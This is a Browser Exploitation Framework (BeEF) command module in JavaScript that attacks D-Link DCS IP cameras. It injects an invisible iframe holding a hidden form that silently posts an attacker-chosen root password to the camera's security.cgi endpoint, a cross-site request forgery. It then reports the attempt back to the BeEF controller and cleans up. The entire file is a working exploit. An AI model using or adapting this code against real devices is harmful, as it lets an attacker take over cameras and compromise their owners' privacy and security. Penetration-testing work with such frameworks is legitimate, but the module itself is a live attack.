// // Copyright (c) 2006-2026Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - https://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var base = '<%= @base %>'; var passwd = '<%= @password %>'; var dlink_dcs_iframe = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); form.setAttribute('action', base + "/setup/security.cgi"); form.setAttribute('method', 'post'); var input = null; input = document.createElement('input'); input.setAttribute('type', 'hidden'); input.setAttribute('name', 'rootpass'); input.setAttribute('value', passwd); form.appendChild(input); input = document.createElement('input'); input.setAttribute('type', 'hidden'); input.setAttribute('name', 'confirm'); input.setAttribute('value', passwd); form.appendChild(input); dlink_dcs_iframe.contentWindow.document.body.appendChild(form); form.submit(); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(dlink_dcs_iframe); } setTimeout("cleanup()", 15000); });